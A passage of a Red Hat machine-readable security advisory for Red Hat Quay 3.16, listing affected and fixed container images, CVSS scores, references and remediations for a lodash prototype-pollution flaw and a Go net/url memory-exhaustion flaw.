"text": "This issue is only exploitable by applications using the _.unset and _.omit functions on an object and allowing user input to determine the path of the property to be removed. This issue only allows the deletion of properties but does not allow overwriting their behavior, limiting the impact to a denial of service. Due to this reason, this vulnerability has been rated with an important severity.\n\nIn Grafana, JavaScript code runs only in the browser, while the server side is all Golang. Therefore, the worst-case scenario is a loss of functionality in the client application inside the browser. To reflect this, the CVSS availability metric and the severity of the Grafana and the Grafana-PCP component have been updated to low and moderate, respectively.\n\nThe lodash dependency is bundled and used by the pcs-web-ui component of the PCS package. In Red Hat Enterprise Linux 8.10, the pcs-web-ui component is no longer included in the PCS package. As a result, RHEL 8.10 does not ship the vulnerable lodash component within PCS and is therefore not-affected by this CVE.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-13465"
},
{
"category": "external",
"summary": "RHBZ#2431740",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431740"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-13465",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-13465"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-13465",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13465"
},
{
"category": "external",
"summary": "https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg",
"url": "https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg"
}
],
"release_date": "2026-01-21T19:05:28.846000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-02T15:17:12+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6497"
},
{
"category": "workaround",
"details": "To mitigate this issue, implement strict input validation before passing any property paths to the _.unset and _.omit functions to block attempts to access the prototype chain. Ensure that strings like __proto__, constructor and prototype are blocked, for example.",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "lodash: prototype pollution in _.unset and _.omit functions"
},
{
"cve": "CVE-2025-61726",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:42.791305+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434432"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: net/url: Memory exhaustion in query parameter parsing in net/url",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker must be able to send a specially crafted HTTP request to an application parsing URL-encoded forms with net/url, specifically a request containing a large number of unique query parameters. The request will cause the application to consume an excessive amount of memory and eventually result in a denial of service, with no impact to confidentiality or integrity. Due to this reason, this vulnerability has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "RHBZ#2434432",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434432"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61726",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61726"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://go.dev/cl/736712",
"url": "https://go.dev/cl/736712"
},
{
"category": "external",
"summary": "https://go.dev/issue/77101",
"url": "https://go.dev/issue/77101"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4341",
"url": "https://pkg.go.dev/vuln/GO-2026-4341"
}
],
"release_date": "2026-01-28T19:30:31.215000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-02T15:17:12+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6497"
},
{
"category": "workaround",
"details": "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
